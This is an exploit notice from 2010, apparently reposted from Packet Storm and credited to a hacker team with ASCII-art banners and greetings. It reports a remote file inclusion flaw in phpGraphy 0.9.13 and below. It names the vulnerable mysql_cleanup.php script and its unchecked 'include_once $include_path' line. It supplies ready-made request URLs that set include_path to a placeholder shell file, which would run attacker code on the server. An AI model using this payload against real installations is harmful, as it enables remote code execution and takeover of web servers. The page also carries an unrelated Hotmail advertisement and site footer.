phpGraphy versions 0.9.13 and below suffer from a remote file inclusion vulnerability.
4259872e8146bcd09671aeffc3dc5d4d95bf78e34a4368ba77fa7f5582f17397
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
+-----------------------------------------------------------------------
-+
| ....... |
| ..''xxxxxxxxxxxxxxx'... |
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. |
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. |
| .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. |
| .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. |
| .xxxxxxxxxxxxxxxxxx'... ........ .'. |
| 'xxxxxxxxxxxxxxx'...... '. |
| 'xxxxxxxxxxxxxx'..'x.. .x. |
| .xxxxxxxxxxxx'...'.. ... .' |
| 'xxxxxxxxx'.. . .. .x. |
| xxxxxxx'. .. x. |
| xxxx'. .... x x. |
| 'x'. ...'xxxxxxx'. x .x. |
| .x'. .'xxxxxxxxxxxxxx. '' .' |
| .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' |
| .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. |
| .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' |
| .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. |
| .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. |
| .'xxxxxxx'.... ...xxxxxxx'. |
| ..'xxxxx'.. ..xxxxx'.. |
| ....'xx'.....''''... |
+-----------------------------------------------------------------------
-+
# ----------------------oOO---(_)---OOo-----------------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# | Security Sn!pEr.S!Te /____/ 2o1o |
# ------------------------------------------------------------
# Remote File Inclusion Vulnerability
# -----------------------------------------------------------
phpGraphy <==0.9.13 (mysql_cleanup.php)
--------------------------------------------------------------
#[+] Author : Sn!pEr.S!Te Hacker #
# [+] Email : sniper-site@HoTMaiL.coM #
# [+] T34M Sn!pEr.S!Te Hacker #
# [+] 1-6-2010 #
# [+] Script : Image Galleries » phpGraphy#
# [+] Download:http://sourceforge.net/projects/phpgraphy/files/phpgraphy/0.9.13b/phpgraphy-0.9.13b.zip/download
# Version: [0.9.13] #
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit :phpgraphy-0.9.13b/base/misc/mysql_cleanup.php
http://localhost/phpgraphy-0.9.13b/base/misc/mysql_cleanup.php?include_path=[shell.txt ]
http://127.0.0.1/phpgraphy-0.9.13b/base/misc/mysql_cleanup.php?include_path=[shell.txt ]
include_once $include_path
line : 25
================== Greetz : all my friend =======================
* PrX Hacker * Sm Hacker * AbUbAdR * mAsH3L ALLiL * EjRaMi HaCkEr |
* HitLer.3rb * DjHacker * Baby Hacker * RaMaD * Maram * saleh Hacker |
_________________________________________________________________
بريدك الإلكتروني والمزيد أثناء تنقلك. احصل على Windows Live Hotmail مجانًا.
https://signup.live.com/signup.aspx?id=60969
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed